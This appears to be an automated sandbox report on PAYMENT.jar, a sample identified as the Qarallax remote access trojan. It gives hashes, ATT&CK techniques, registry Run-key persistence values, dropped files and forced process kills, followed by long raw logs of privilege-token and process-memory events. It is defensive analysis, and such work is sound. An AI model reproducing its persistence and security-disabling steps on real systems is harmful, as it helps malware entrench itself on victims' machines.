qarallax | e1e1ea1f7dc17228b04b3bd0c1ed60b614fdd8b03f82a41508eabb1b51932a3b

Analysis

max time kernel
146s
max time network
174s
platform
windows10_x64
resource
win10
submitted
19-08-2020 07:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PAYMENT.jar
Size

399KB
MD5

eb65bbf22d4e40550c189075b699b5f0
SHA1

f0e43eea39f34135746321b3a6652f7dabfbd279
SHA256

e1e1ea1f7dc17228b04b3bd0c1ed60b614fdd8b03f82a41508eabb1b51932a3b
SHA512

a87e6733a93c77fe09b98eed39e1905c884104da84ecfc6796a82c085f2b7e1193db0d1df0577881d412202814058661e908ce00e08349d06782e732d775b00b

Score

10^/10

persistence evasion trojan qarallax

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
QarallaxRAT
Qarallax is a RAT developed by Quaverse and sold as RaaS (RAT as a Service).
trojan qarallax

Qarallax RAT support DLL 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001ae37-64.dat	qarallax_dll

Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Loads dropped DLL 1 IoCs

pid	Process
3056	java.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run\UuvhMEW = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\oWsdf\\MIJPw.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\UuvhMEW = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\oWsdf\\MIJPw.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\oWsdf\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\oWsdf\Desktop.ini	java.exe
File created	C:\Users\Admin\oWsdf\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\oWsdf\Desktop.ini	attrib.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\mNZIa	java.exe
File opened for modification	C:\Windows\System32\mNZIa	java.exe

Kills process with taskkill 16 IoCs

evasion

pid	Process
4568	taskkill.exe
4960	taskkill.exe
2984	taskkill.exe
2068	taskkill.exe
4204	taskkill.exe
2052	taskkill.exe
4900	taskkill.exe
5080	taskkill.exe
2280	taskkill.exe
1604	taskkill.exe
4204	taskkill.exe
4568	taskkill.exe
3940	taskkill.exe
1268	taskkill.exe
4588	taskkill.exe
2516	taskkill.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
3692	powershell.exe
3692	powershell.exe
3692	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3056	java.exe

Suspicious use of AdjustPrivilegeToken 164 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3548	WMIC.exe
Token: SeSecurityPrivilege	3548	WMIC.exe
Token: SeTakeOwnershipPrivilege	3548	WMIC.exe
Token: SeLoadDriverPrivilege	3548	WMIC.exe
Token: SeSystemProfilePrivilege	3548	WMIC.exe
Token: SeSystemtimePrivilege	3548	WMIC.exe
Token: SeProfSingleProcessPrivilege	3548	WMIC.exe
Token: SeIncBasePriorityPrivilege	3548	WMIC.exe
Token: SeCreatePagefilePrivilege	3548	WMIC.exe
Token: SeBackupPrivilege	3548	WMIC.exe
Token: SeRestorePrivilege	3548	WMIC.exe
Token: SeShutdownPrivilege	3548	WMIC.exe
Token: SeDebugPrivilege	3548	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3548	WMIC.exe
Token: SeRemoteShutdownPrivilege	3548	WMIC.exe
Token: SeUndockPrivilege	3548	WMIC.exe
Token: SeManageVolumePrivilege	3548	WMIC.exe
Token: 33	3548	WMIC.exe
Token: 34	3548	WMIC.exe
Token: 35	3548	WMIC.exe
Token: 36	3548	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3548	WMIC.exe
Token: SeSecurityPrivilege	3548	WMIC.exe
Token: SeTakeOwnershipPrivilege	3548	WMIC.exe
Token: SeLoadDriverPrivilege	3548	WMIC.exe
Token: SeSystemProfilePrivilege	3548	WMIC.exe
Token: SeSystemtimePrivilege	3548	WMIC.exe
Token: SeProfSingleProcessPrivilege	3548	WMIC.exe
Token: SeIncBasePriorityPrivilege	3548	WMIC.exe
Token: SeCreatePagefilePrivilege	3548	WMIC.exe
Token: SeBackupPrivilege	3548	WMIC.exe
Token: SeRestorePrivilege	3548	WMIC.exe
Token: SeShutdownPrivilege	3548	WMIC.exe
Token: SeDebugPrivilege	3548	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3548	WMIC.exe
Token: SeRemoteShutdownPrivilege	3548	WMIC.exe
Token: SeUndockPrivilege	3548	WMIC.exe
Token: SeManageVolumePrivilege	3548	WMIC.exe
Token: 33	3548	WMIC.exe
Token: 34	3548	WMIC.exe
Token: 35	3548	WMIC.exe
Token: 36	3548	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1432	WMIC.exe
Token: SeSecurityPrivilege	1432	WMIC.exe
Token: SeTakeOwnershipPrivilege	1432	WMIC.exe
Token: SeLoadDriverPrivilege	1432	WMIC.exe
Token: SeSystemProfilePrivilege	1432	WMIC.exe
Token: SeSystemtimePrivilege	1432	WMIC.exe
Token: SeProfSingleProcessPrivilege	1432	WMIC.exe
Token: SeIncBasePriorityPrivilege	1432	WMIC.exe
Token: SeCreatePagefilePrivilege	1432	WMIC.exe
Token: SeBackupPrivilege	1432	WMIC.exe
Token: SeRestorePrivilege	1432	WMIC.exe
Token: SeShutdownPrivilege	1432	WMIC.exe
Token: SeDebugPrivilege	1432	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1432	WMIC.exe
Token: SeRemoteShutdownPrivilege	1432	WMIC.exe
Token: SeUndockPrivilege	1432	WMIC.exe
Token: SeManageVolumePrivilege	1432	WMIC.exe
Token: 33	1432	WMIC.exe
Token: 34	1432	WMIC.exe
Token: 35	1432	WMIC.exe
Token: 36	1432	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1432	WMIC.exe
Token: SeSecurityPrivilege	1432	WMIC.exe
Token: SeTakeOwnershipPrivilege	1432	WMIC.exe
Token: SeLoadDriverPrivilege	1432	WMIC.exe
Token: SeSystemProfilePrivilege	1432	WMIC.exe
Token: SeSystemtimePrivilege	1432	WMIC.exe
Token: SeProfSingleProcessPrivilege	1432	WMIC.exe
Token: SeIncBasePriorityPrivilege	1432	WMIC.exe
Token: SeCreatePagefilePrivilege	1432	WMIC.exe
Token: SeBackupPrivilege	1432	WMIC.exe
Token: SeRestorePrivilege	1432	WMIC.exe
Token: SeShutdownPrivilege	1432	WMIC.exe
Token: SeDebugPrivilege	1432	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1432	WMIC.exe
Token: SeRemoteShutdownPrivilege	1432	WMIC.exe
Token: SeUndockPrivilege	1432	WMIC.exe
Token: SeManageVolumePrivilege	1432	WMIC.exe
Token: 33	1432	WMIC.exe
Token: 34	1432	WMIC.exe
Token: 35	1432	WMIC.exe
Token: 36	1432	WMIC.exe
Token: SeDebugPrivilege	2280	taskkill.exe
Token: SeDebugPrivilege	3692	powershell.exe
Token: SeDebugPrivilege	1268	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3692	powershell.exe
Token: SeSecurityPrivilege	3692	powershell.exe
Token: SeTakeOwnershipPrivilege	3692	powershell.exe
Token: SeLoadDriverPrivilege	3692	powershell.exe
Token: SeSystemProfilePrivilege	3692	powershell.exe
Token: SeSystemtimePrivilege	3692	powershell.exe
Token: SeProfSingleProcessPrivilege	3692	powershell.exe
Token: SeIncBasePriorityPrivilege	3692	powershell.exe
Token: SeCreatePagefilePrivilege	3692	powershell.exe
Token: SeBackupPrivilege	3692	powershell.exe
Token: SeRestorePrivilege	3692	powershell.exe
Token: SeShutdownPrivilege	3692	powershell.exe
Token: SeDebugPrivilege	3692	powershell.exe
Token: SeSystemEnvironmentPrivilege	3692	powershell.exe
Token: SeRemoteShutdownPrivilege	3692	powershell.exe
Token: SeUndockPrivilege	3692	powershell.exe
Token: SeManageVolumePrivilege	3692	powershell.exe
Token: 33	3692	powershell.exe
Token: 34	3692	powershell.exe
Token: 35	3692	powershell.exe
Token: 36	3692	powershell.exe
Token: SeDebugPrivilege	1604	taskkill.exe
Token: SeIncreaseQuotaPrivilege	572	WMIC.exe
Token: SeSecurityPrivilege	572	WMIC.exe
Token: SeTakeOwnershipPrivilege	572	WMIC.exe
Token: SeLoadDriverPrivilege	572	WMIC.exe
Token: SeSystemProfilePrivilege	572	WMIC.exe
Token: SeSystemtimePrivilege	572	WMIC.exe
Token: SeProfSingleProcessPrivilege	572	WMIC.exe
Token: SeIncBasePriorityPrivilege	572	WMIC.exe
Token: SeCreatePagefilePrivilege	572	WMIC.exe
Token: SeBackupPrivilege	572	WMIC.exe
Token: SeRestorePrivilege	572	WMIC.exe
Token: SeShutdownPrivilege	572	WMIC.exe
Token: SeDebugPrivilege	572	WMIC.exe
Token: SeSystemEnvironmentPrivilege	572	WMIC.exe
Token: SeRemoteShutdownPrivilege	572	WMIC.exe
Token: SeUndockPrivilege	572	WMIC.exe
Token: SeManageVolumePrivilege	572	WMIC.exe
Token: 33	572	WMIC.exe
Token: 34	572	WMIC.exe
Token: 35	572	WMIC.exe
Token: 36	572	WMIC.exe
Token: SeIncreaseQuotaPrivilege	572	WMIC.exe
Token: SeSecurityPrivilege	572	WMIC.exe
Token: SeTakeOwnershipPrivilege	572	WMIC.exe
Token: SeLoadDriverPrivilege	572	WMIC.exe
Token: SeSystemProfilePrivilege	572	WMIC.exe
Token: SeSystemtimePrivilege	572	WMIC.exe
Token: SeProfSingleProcessPrivilege	572	WMIC.exe
Token: SeIncBasePriorityPrivilege	572	WMIC.exe
Token: SeCreatePagefilePrivilege	572	WMIC.exe
Token: SeBackupPrivilege	572	WMIC.exe
Token: SeRestorePrivilege	572	WMIC.exe
Token: SeShutdownPrivilege	572	WMIC.exe
Token: SeDebugPrivilege	572	WMIC.exe
Token: SeSystemEnvironmentPrivilege	572	WMIC.exe
Token: SeRemoteShutdownPrivilege	572	WMIC.exe
Token: SeUndockPrivilege	572	WMIC.exe
Token: SeManageVolumePrivilege	572	WMIC.exe
Token: 33	572	WMIC.exe
Token: 34	572	WMIC.exe
Token: 35	572	WMIC.exe
Token: 36	572	WMIC.exe
Token: SeDebugPrivilege	2052	taskkill.exe
Token: SeDebugPrivilege	4588	taskkill.exe
Token: SeDebugPrivilege	4900	taskkill.exe
Token: SeDebugPrivilege	5080	taskkill.exe
Token: SeDebugPrivilege	2984	taskkill.exe
Token: SeDebugPrivilege	2068	taskkill.exe
Token: SeDebugPrivilege	2516	taskkill.exe
Token: SeDebugPrivilege	4204	taskkill.exe
Token: SeDebugPrivilege	4568	taskkill.exe
Token: SeDebugPrivilege	3940	taskkill.exe
Token: SeDebugPrivilege	4204	taskkill.exe
Token: SeDebugPrivilege	4568	taskkill.exe
Token: SeDebugPrivilege	4960	taskkill.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3056	java.exe

Suspicious use of WriteProcessMemory 386 IoCs

description	pid	Process	procid_target
PID 3056 wrote to memory of 3636	3056	java.exe	68
PID 3056 wrote to memory of 3636	3056	java.exe	68
PID 3056 wrote to memory of 3808	3056	java.exe	70
PID 3056 wrote to memory of 3808	3056	java.exe	70
PID 3808 wrote to memory of 3548	3808	cmd.exe	72
PID 3808 wrote to memory of 3548	3808	cmd.exe	72
PID 3056 wrote to memory of 3560	3056	java.exe	73
PID 3056 wrote to memory of 3560	3056	java.exe	73
PID 3560 wrote to memory of 1432	3560	cmd.exe	75
PID 3560 wrote to memory of 1432	3560	cmd.exe	75
PID 3056 wrote to memory of 504	3056	java.exe	76
PID 3056 wrote to memory of 504	3056	java.exe	76
PID 3056 wrote to memory of 904	3056	java.exe	78
PID 3056 wrote to memory of 904	3056	java.exe	78
PID 3056 wrote to memory of 1060	3056	java.exe	80
PID 3056 wrote to memory of 1060	3056	java.exe	80
PID 3056 wrote to memory of 1152	3056	java.exe	81
PID 3056 wrote to memory of 1152	3056	java.exe	81
PID 3056 wrote to memory of 1240	3056	java.exe	83
PID 3056 wrote to memory of 1240	3056	java.exe	83
PID 3056 wrote to memory of 1416	3056	java.exe	85
PID 3056 wrote to memory of 1416	3056	java.exe	85
PID 3056 wrote to memory of 1588	3056	java.exe	87
PID 3056 wrote to memory of 1588	3056	java.exe	87
PID 3056 wrote to memory of 1752	3056	java.exe	89
PID 3056 wrote to memory of 1752	3056	java.exe	89
PID 3056 wrote to memory of 2896	3056	java.exe	92
PID 3056 wrote to memory of 2896	3056	java.exe	92
PID 3056 wrote to memory of 2280	3056	java.exe	94
PID 3056 wrote to memory of 2280	3056	java.exe	94
PID 3056 wrote to memory of 3860	3056	java.exe	95
PID 3056 wrote to memory of 3860	3056	java.exe	95
PID 3056 wrote to memory of 3692	3056	java.exe	96
PID 3056 wrote to memory of 3692	3056	java.exe	96
PID 2896 wrote to memory of 4024	2896	cmd.exe	97
PID 2896 wrote to memory of 4024	2896	cmd.exe	97
PID 3056 wrote to memory of 2108	3056	java.exe	98
PID 3056 wrote to memory of 2108	3056	java.exe	98
PID 3056 wrote to memory of 3652	3056	java.exe	103
PID 3056 wrote to memory of 3652	3056	java.exe	103
PID 3056 wrote to memory of 3048	3056	java.exe	104
PID 3056 wrote to memory of 3048	3056	java.exe	104
PID 3056 wrote to memory of 572	3056	java.exe	107
PID 3056 wrote to memory of 572	3056	java.exe	107
PID 3056 wrote to memory of 640	3056	java.exe	108
PID 3056 wrote to memory of 640	3056	java.exe	108
PID 3056 wrote to memory of 1252	3056	java.exe	110
PID 3056 wrote to memory of 1252	3056	java.exe	110
PID 3056 wrote to memory of 1440	3056	java.exe	112
PID 3056 wrote to memory of 1440	3056	java.exe	112
PID 3056 wrote to memory of 2524	3056	java.exe	115
PID 3056 wrote to memory of 2524	3056	java.exe	115
PID 3056 wrote to memory of 2920	3056	java.exe	117
PID 3056 wrote to memory of 2920	3056	java.exe	117
PID 3056 wrote to memory of 508	3056	java.exe	119
PID 3056 wrote to memory of 508	3056	java.exe	119
PID 3056 wrote to memory of 1244	3056	java.exe	121
PID 3056 wrote to memory of 1244	3056	java.exe	121
PID 3056 wrote to memory of 2744	3056	java.exe	123
PID 3056 wrote to memory of 2744	3056	java.exe	123
PID 2896 wrote to memory of 424	2896	cmd.exe	125
PID 2896 wrote to memory of 424	2896	cmd.exe	125
PID 3056 wrote to memory of 2464	3056	java.exe	127
PID 3056 wrote to memory of 2464	3056	java.exe	127
PID 3056 wrote to memory of 1080	3056	java.exe	129
PID 3056 wrote to memory of 1080	3056	java.exe	129
PID 3056 wrote to memory of 1748	3056	java.exe	131
PID 3056 wrote to memory of 1748	3056	java.exe	131
PID 3056 wrote to memory of 1268	3056	java.exe	132
PID 3056 wrote to memory of 1268	3056	java.exe	132
PID 3056 wrote to memory of 3048	3056	java.exe	135
PID 3056 wrote to memory of 3048	3056	java.exe	135
PID 3056 wrote to memory of 1604	3056	java.exe	137
PID 3056 wrote to memory of 1604	3056	java.exe	137
PID 3056 wrote to memory of 648	3056	java.exe	139
PID 3056 wrote to memory of 648	3056	java.exe	139
PID 3056 wrote to memory of 740	3056	java.exe	141
PID 3056 wrote to memory of 740	3056	java.exe	141
PID 3056 wrote to memory of 2680	3056	java.exe	143
PID 3056 wrote to memory of 2680	3056	java.exe	143
PID 2680 wrote to memory of 1772	2680	cmd.exe	145
PID 2680 wrote to memory of 1772	2680	cmd.exe	145
PID 2680 wrote to memory of 2144	2680	cmd.exe	146
PID 2680 wrote to memory of 2144	2680	cmd.exe	146
PID 3056 wrote to memory of 2140	3056	java.exe	147
PID 3056 wrote to memory of 2140	3056	java.exe	147
PID 2140 wrote to memory of 2908	2140	cmd.exe	149
PID 2140 wrote to memory of 2908	2140	cmd.exe	149
PID 2140 wrote to memory of 3508	2140	cmd.exe	150
PID 2140 wrote to memory of 3508	2140	cmd.exe	150
PID 3056 wrote to memory of 3004	3056	java.exe	151
PID 3056 wrote to memory of 3004	3056	java.exe	151
PID 3004 wrote to memory of 2168	3004	cmd.exe	153
PID 3004 wrote to memory of 2168	3004	cmd.exe	153
PID 3004 wrote to memory of 1244	3004	cmd.exe	154
PID 3004 wrote to memory of 1244	3004	cmd.exe	154
PID 3056 wrote to memory of 1604	3056	java.exe	155
PID 3056 wrote to memory of 1604	3056	java.exe	155
PID 3056 wrote to memory of 2144	3056	java.exe	158
PID 3056 wrote to memory of 2144	3056	java.exe	158
PID 2144 wrote to memory of 496	2144	cmd.exe	160
PID 2144 wrote to memory of 496	2144	cmd.exe	160
PID 2144 wrote to memory of 1280	2144	cmd.exe	161
PID 2144 wrote to memory of 1280	2144	cmd.exe	161
PID 3056 wrote to memory of 2280	3056	java.exe	162
PID 3056 wrote to memory of 2280	3056	java.exe	162
PID 2280 wrote to memory of 2908	2280	cmd.exe	164
PID 2280 wrote to memory of 2908	2280	cmd.exe	164
PID 2280 wrote to memory of 1028	2280	cmd.exe	165
PID 2280 wrote to memory of 1028	2280	cmd.exe	165
PID 3056 wrote to memory of 492	3056	java.exe	166
PID 3056 wrote to memory of 492	3056	java.exe	166
PID 492 wrote to memory of 1652	492	cmd.exe	168
PID 492 wrote to memory of 1652	492	cmd.exe	168
PID 492 wrote to memory of 540	492	cmd.exe	169
PID 492 wrote to memory of 540	492	cmd.exe	169
PID 3056 wrote to memory of 740	3056	java.exe	170
PID 3056 wrote to memory of 740	3056	java.exe	170
PID 3056 wrote to memory of 3548	3056	java.exe	171
PID 3056 wrote to memory of 3548	3056	java.exe	171
PID 740 wrote to memory of 572	740	cmd.exe	174
PID 740 wrote to memory of 572	740	cmd.exe	174
PID 3548 wrote to memory of 1028	3548	cmd.exe	175
PID 3548 wrote to memory of 1028	3548	cmd.exe	175
PID 3548 wrote to memory of 3076	3548	cmd.exe	176
PID 3548 wrote to memory of 3076	3548	cmd.exe	176
PID 3056 wrote to memory of 908	3056	java.exe	177
PID 3056 wrote to memory of 908	3056	java.exe	177
PID 908 wrote to memory of 3528	908	cmd.exe	179
PID 908 wrote to memory of 3528	908	cmd.exe	179
PID 908 wrote to memory of 3692	908	cmd.exe	180
PID 908 wrote to memory of 3692	908	cmd.exe	180
PID 3056 wrote to memory of 3524	3056	java.exe	181
PID 3056 wrote to memory of 3524	3056	java.exe	181
PID 3524 wrote to memory of 496	3524	cmd.exe	183
PID 3524 wrote to memory of 496	3524	cmd.exe	183
PID 3524 wrote to memory of 2516	3524	cmd.exe	184
PID 3524 wrote to memory of 2516	3524	cmd.exe	184
PID 3056 wrote to memory of 2052	3056	java.exe	185
PID 3056 wrote to memory of 2052	3056	java.exe	185
PID 3056 wrote to memory of 3144	3056	java.exe	187
PID 3056 wrote to memory of 3144	3056	java.exe	187
PID 3144 wrote to memory of 496	3144	cmd.exe	189
PID 3144 wrote to memory of 496	3144	cmd.exe	189
PID 3144 wrote to memory of 2632	3144	cmd.exe	190
PID 3144 wrote to memory of 2632	3144	cmd.exe	190
PID 3056 wrote to memory of 496	3056	java.exe	191
PID 3056 wrote to memory of 496	3056	java.exe	191
PID 496 wrote to memory of 4124	496	cmd.exe	193
PID 496 wrote to memory of 4124	496	cmd.exe	193
PID 496 wrote to memory of 4144	496	cmd.exe	194
PID 496 wrote to memory of 4144	496	cmd.exe	194
PID 3056 wrote to memory of 4164	3056	java.exe	195
PID 3056 wrote to memory of 4164	3056	java.exe	195
PID 4164 wrote to memory of 4200	4164	cmd.exe	197
PID 4164 wrote to memory of 4200	4164	cmd.exe	197
PID 4164 wrote to memory of 4220	4164	cmd.exe	198
PID 4164 wrote to memory of 4220	4164	cmd.exe	198
PID 3056 wrote to memory of 4236	3056	java.exe	199
PID 3056 wrote to memory of 4236	3056	java.exe	199
PID 4236 wrote to memory of 4272	4236	cmd.exe	201
PID 4236 wrote to memory of 4272	4236	cmd.exe	201
PID 4236 wrote to memory of 4292	4236	cmd.exe	202
PID 4236 wrote to memory of 4292	4236	cmd.exe	202
PID 3056 wrote to memory of 4312	3056	java.exe	203
PID 3056 wrote to memory of 4312	3056	java.exe	203
PID 4312 wrote to memory of 4348	4312	cmd.exe	205
PID 4312 wrote to memory of 4348	4312	cmd.exe	205
PID 4312 wrote to memory of 4368	4312	cmd.exe	206
PID 4312 wrote to memory of 4368	4312	cmd.exe	206
PID 3056 wrote to memory of 4384	3056	java.exe	207
PID 3056 wrote to memory of 4384	3056	java.exe	207
PID 4384 wrote to memory of 4420	4384	cmd.exe	209
PID 4384 wrote to memory of 4420	4384	cmd.exe	209
PID 4384 wrote to memory of 4440	4384	cmd.exe	210
PID 4384 wrote to memory of 4440	4384	cmd.exe	210
PID 3056 wrote to memory of 4456	3056	java.exe	211
PID 3056 wrote to memory of 4456	3056	java.exe	211
PID 4456 wrote to memory of 4492	4456	cmd.exe	213
PID 4456 wrote to memory of 4492	4456	cmd.exe	213
PID 4456 wrote to memory of 4512	4456	cmd.exe	214
PID 4456 wrote to memory of 4512	4456	cmd.exe	214
PID 3056 wrote to memory of 4532	3056	java.exe	215
PID 3056 wrote to memory of 4532	3056	java.exe	215
PID 4532 wrote to memory of 4568	4532	cmd.exe	217
PID 4532 wrote to memory of 4568	4532	cmd.exe	217
PID 3056 wrote to memory of 4588	3056	java.exe	218
PID 3056 wrote to memory of 4588	3056	java.exe	218
PID 4532 wrote to memory of 4608	4532	cmd.exe	220
PID 4532 wrote to memory of 4608	4532	cmd.exe	220
PID 3056 wrote to memory of 4648	3056	java.exe	221
PID 3056 wrote to memory of 4648	3056	java.exe	221
PID 4648 wrote to memory of 4708	4648	cmd.exe	223
PID 4648 wrote to memory of 4708	4648	cmd.exe	223
PID 4648 wrote to memory of 4724	4648	cmd.exe	224
PID 4648 wrote to memory of 4724	4648	cmd.exe	224
PID 3056 wrote to memory of 4744	3056	java.exe	225
PID 3056 wrote to memory of 4744	3056	java.exe	225
PID 4744 wrote to memory of 4780	4744	cmd.exe	227
PID 4744 wrote to memory of 4780	4744	cmd.exe	227
PID 4744 wrote to memory of 4800	4744	cmd.exe	228
PID 4744 wrote to memory of 4800	4744	cmd.exe	228
PID 3056 wrote to memory of 4820	3056	java.exe	229
PID 3056 wrote to memory of 4820	3056	java.exe	229
PID 4820 wrote to memory of 4856	4820	cmd.exe	231
PID 4820 wrote to memory of 4856	4820	cmd.exe	231
PID 4820 wrote to memory of 4876	4820	cmd.exe	232
PID 4820 wrote to memory of 4876	4820	cmd.exe	232
PID 3056 wrote to memory of 4900	3056	java.exe	233
PID 3056 wrote to memory of 4896	3056	java.exe	234
PID 3056 wrote to memory of 4900	3056	java.exe	233
PID 3056 wrote to memory of 4896	3056	java.exe	234
PID 4896 wrote to memory of 4972	4896	cmd.exe	237
PID 4896 wrote to memory of 4972	4896	cmd.exe	237
PID 4896 wrote to memory of 5004	4896	cmd.exe	238
PID 4896 wrote to memory of 5004	4896	cmd.exe	238
PID 3056 wrote to memory of 5032	3056	java.exe	239
PID 3056 wrote to memory of 5032	3056	java.exe	239
PID 5032 wrote to memory of 5068	5032	cmd.exe	241
PID 5032 wrote to memory of 5068	5032	cmd.exe	241
PID 5032 wrote to memory of 5088	5032	cmd.exe	242
PID 5032 wrote to memory of 5088	5032	cmd.exe	242
PID 3056 wrote to memory of 5108	3056	java.exe	243
PID 3056 wrote to memory of 5108	3056	java.exe	243
PID 5108 wrote to memory of 2516	5108	cmd.exe	245
PID 5108 wrote to memory of 2516	5108	cmd.exe	245
PID 5108 wrote to memory of 2052	5108	cmd.exe	246
PID 5108 wrote to memory of 2052	5108	cmd.exe	246
PID 3056 wrote to memory of 4132	3056	java.exe	247
PID 3056 wrote to memory of 4132	3056	java.exe	247
PID 4132 wrote to memory of 4152	4132	cmd.exe	249
PID 4132 wrote to memory of 4152	4132	cmd.exe	249
PID 4132 wrote to memory of 4216	4132	cmd.exe	250
PID 4132 wrote to memory of 4216	4132	cmd.exe	250
PID 3056 wrote to memory of 4232	3056	java.exe	251
PID 3056 wrote to memory of 4232	3056	java.exe	251
PID 4232 wrote to memory of 4272	4232	cmd.exe	253
PID 4232 wrote to memory of 4272	4232	cmd.exe	253
PID 4232 wrote to memory of 4320	4232	cmd.exe	254
PID 4232 wrote to memory of 4320	4232	cmd.exe	254
PID 3056 wrote to memory of 4352	3056	java.exe	255
PID 3056 wrote to memory of 4352	3056	java.exe	255
PID 4352 wrote to memory of 4400	4352	cmd.exe	257
PID 4352 wrote to memory of 4400	4352	cmd.exe	257
PID 4352 wrote to memory of 1264	4352	cmd.exe	258
PID 4352 wrote to memory of 1264	4352	cmd.exe	258
PID 3056 wrote to memory of 3016	3056	java.exe	259
PID 3056 wrote to memory of 3016	3056	java.exe	259
PID 3016 wrote to memory of 1008	3016	cmd.exe	261
PID 3016 wrote to memory of 1008	3016	cmd.exe	261
PID 3016 wrote to memory of 3796	3016	cmd.exe	262
PID 3016 wrote to memory of 3796	3016	cmd.exe	262
PID 3056 wrote to memory of 4508	3056	java.exe	263
PID 3056 wrote to memory of 4508	3056	java.exe	263
PID 4508 wrote to memory of 4548	4508	cmd.exe	265
PID 4508 wrote to memory of 4548	4508	cmd.exe	265
PID 4508 wrote to memory of 4580	4508	cmd.exe	266
PID 4508 wrote to memory of 4580	4508	cmd.exe	266
PID 3056 wrote to memory of 4612	3056	java.exe	267
PID 3056 wrote to memory of 4612	3056	java.exe	267
PID 4612 wrote to memory of 4696	4612	cmd.exe	269
PID 4612 wrote to memory of 4696	4612	cmd.exe	269
PID 4612 wrote to memory of 4632	4612	cmd.exe	270
PID 4612 wrote to memory of 4632	4612	cmd.exe	270
PID 3056 wrote to memory of 4736	3056	java.exe	271
PID 3056 wrote to memory of 4736	3056	java.exe	271
PID 4736 wrote to memory of 4760	4736	cmd.exe	273
PID 4736 wrote to memory of 4760	4736	cmd.exe	273
PID 4736 wrote to memory of 4808	4736	cmd.exe	274
PID 4736 wrote to memory of 4808	4736	cmd.exe	274
PID 3056 wrote to memory of 4800	3056	java.exe	275
PID 3056 wrote to memory of 4800	3056	java.exe	275
PID 4800 wrote to memory of 4880	4800	cmd.exe	277
PID 4800 wrote to memory of 4880	4800	cmd.exe	277
PID 4800 wrote to memory of 4932	4800	cmd.exe	278
PID 4800 wrote to memory of 4932	4800	cmd.exe	278
PID 3056 wrote to memory of 4992	3056	java.exe	279
PID 3056 wrote to memory of 4992	3056	java.exe	279
PID 4992 wrote to memory of 5028	4992	cmd.exe	281
PID 4992 wrote to memory of 5028	4992	cmd.exe	281
PID 4992 wrote to memory of 5000	4992	cmd.exe	282
PID 4992 wrote to memory of 5000	4992	cmd.exe	282
PID 3056 wrote to memory of 4948	3056	java.exe	283
PID 3056 wrote to memory of 4948	3056	java.exe	283
PID 3056 wrote to memory of 5080	3056	java.exe	285
PID 3056 wrote to memory of 5080	3056	java.exe	285
PID 4948 wrote to memory of 668	4948	cmd.exe	287
PID 4948 wrote to memory of 668	4948	cmd.exe	287
PID 4948 wrote to memory of 4208	4948	cmd.exe	288
PID 4948 wrote to memory of 4208	4948	cmd.exe	288
PID 3056 wrote to memory of 4212	3056	java.exe	289
PID 3056 wrote to memory of 4212	3056	java.exe	289
PID 4212 wrote to memory of 4296	4212	cmd.exe	291
PID 4212 wrote to memory of 4296	4212	cmd.exe	291
PID 4212 wrote to memory of 2108	4212	cmd.exe	292
PID 4212 wrote to memory of 2108	4212	cmd.exe	292
PID 3056 wrote to memory of 4428	3056	java.exe	293
PID 3056 wrote to memory of 4428	3056	java.exe	293
PID 4428 wrote to memory of 3168	4428	cmd.exe	295
PID 4428 wrote to memory of 3168	4428	cmd.exe	295
PID 4428 wrote to memory of 2744	4428	cmd.exe	296
PID 4428 wrote to memory of 2744	4428	cmd.exe	296
PID 3056 wrote to memory of 4464	3056	java.exe	297
PID 3056 wrote to memory of 4464	3056	java.exe	297
PID 4464 wrote to memory of 4584	4464	cmd.exe	299
PID 4464 wrote to memory of 4584	4464	cmd.exe	299
PID 4464 wrote to memory of 4568	4464	cmd.exe	300
PID 4464 wrote to memory of 4568	4464	cmd.exe	300
PID 3056 wrote to memory of 4708	3056	java.exe	301
PID 3056 wrote to memory of 4708	3056	java.exe	301
PID 4708 wrote to memory of 4588	4708	cmd.exe	303
PID 4708 wrote to memory of 4588	4708	cmd.exe	303
PID 4708 wrote to memory of 4796	4708	cmd.exe	304
PID 4708 wrote to memory of 4796	4708	cmd.exe	304
PID 3056 wrote to memory of 4816	3056	java.exe	305
PID 3056 wrote to memory of 4816	3056	java.exe	305
PID 4816 wrote to memory of 4880	4816	cmd.exe	307
PID 4816 wrote to memory of 4880	4816	cmd.exe	307
PID 4816 wrote to memory of 4972	4816	cmd.exe	308
PID 4816 wrote to memory of 4972	4816	cmd.exe	308
PID 3056 wrote to memory of 4944	3056	java.exe	309
PID 3056 wrote to memory of 4944	3056	java.exe	309
PID 4944 wrote to memory of 5068	4944	cmd.exe	311
PID 4944 wrote to memory of 5068	4944	cmd.exe	311
